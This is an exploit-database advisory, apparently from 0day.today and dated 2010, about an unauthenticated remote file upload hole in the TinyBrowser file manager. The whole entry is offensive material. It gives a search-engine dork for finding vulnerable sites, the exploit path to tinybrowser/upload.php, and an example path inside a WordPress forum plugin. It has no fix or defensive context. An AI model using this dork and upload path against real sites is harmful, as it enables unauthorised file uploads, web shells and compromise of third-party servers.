id: 12340
date: 05/22/2010
title: TinyBrowser Remote File upload Vulnerability
author: ra3ch
cves: 

============================================
TinyBrowser Remote File upload Vulnerability
============================================


************************************************************
**   TinyBrowser Remote File upload Vulnerability
************************************************************
**  Prodcut:        TinyBrowser  
**  Home   :        www.dz4all.com/cc
**  Vunlerability :     Remote File upload
**  Risk  :     High
**  Dork :      inurl:"tinybrowser.php?"
************************************************************
** Discovred by:    Ra3cH
** From        :    Algeria
** Contact     :    e51@hotmail.fr
** *********************************************************
************************************************************
**  Exploit:
**  http://[PATH]/tinybrowser/upload.php?type=
**  
** 
************************************************************
**  Exemple:
**  http://[site]/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/upload.php?type=
**
************************************************************ 



#  0day.today [2023-03-27]  #